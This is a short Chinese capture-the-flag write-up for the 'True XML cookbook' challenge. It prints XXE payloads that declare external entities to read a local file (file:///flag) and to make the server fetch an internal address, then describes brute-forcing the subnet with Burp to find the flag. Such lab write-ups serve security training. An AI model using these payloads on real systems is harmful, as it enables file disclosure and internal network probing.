True XML cookbook

worker..2024-08-26 1:38

打开题目

看到登录口

随便输入admin,123456,然后抓包试一下

先按原来那道题的payload进行测试,payload和结果如下:

<?xml version="1.0" ?>

<!DOCTYPE llw [

<!ENTITY file SYSTEM "file:///flag">

]>

<user>

<username>&file;</username>

<password>1</password>

</user>

未成功获取到flag信息,试着探测内网信息,读取下系统内的配置文件信息看是否能发现有用的信息

这里获得一个新的地址,尝试下进行连接结果如下:

<?xml version="1.0" ?>

<!DOCTYPE llw [

<!ENTITY file SYSTEM "http://10.244.80.49/">

]>

<user>

<username>&file;</username>

<password>1</password>

</user>

连接失败,那就查询下同网段内存在不存在其他地址,使用bp的爆破模块进行爆破,设置如下:

扫描可得到flag

相关推荐
hashiqimiya6 小时前
每日android布局xml文件
android·xml·gitee
2601_9611940210 小时前
27考研资料|百度网盘|夸克网盘
android·xml·考研·ios·iphone·xcode·webview
许彰午3 天前
在PowerBuilder里手写XML序列化——没有现成库的年代怎么拼报文
xml·linux·服务器
坚果的博客4 天前
鸿蒙PC三方库适配OAT.xml 与 SHA512SUM 解读:开源合规与源码校验
xml·开源·harmonyos
奇树谦4 天前
YAML、XML、JSON、TOML、INI、CSV 全面对比:配置文件和数据交换到底该怎么选?
xml·json
南山丶无梅落5 天前
XXE漏洞
xml·漏洞·xxe·网安
小书房5 天前
Android UI为什么由XML转向Compose
xml·ui·compose·声明式ui
学编程的小程5 天前
配置范式演进:XML、JavaConfig 与 Spring Boot
xml·spring boot·后端
le1616166 天前
Android Compose基础布局——从传统XML的视角切入了解
xml·compose
XiYang-DING7 天前
【MyBatis】XML方式实现CRUD
xml·mybatis
热门推荐
01【AI】2026 年具身智能模型和世界模型总结02GitHub 镜像站点032026 年 AI 编程工具终极横评:Cursor vs Claude Code vs Copilot vs Windsurf04Codex 下载安装指南:Windows 和 macOS 官方版下载052026 AI 编程工具终极实战指南:Cursor vs Claude Code vs Copilot,开发者该怎么选?06【踩坑记录 | 第一篇】微软商店无法使用时,如何手动安装 OpenAI Codex?附`.msix`文件系统错误解决方法07CC-Switch & Claude 基于 Linux 服务器安装使用指南08Agnes AI 全模态 API 免费实测报告:文生图 + 文生视频完整测试09CC-Switch 下载、安装与使用配置指南【2026.5.29】10AI科技热点日报 | 2026年6月1日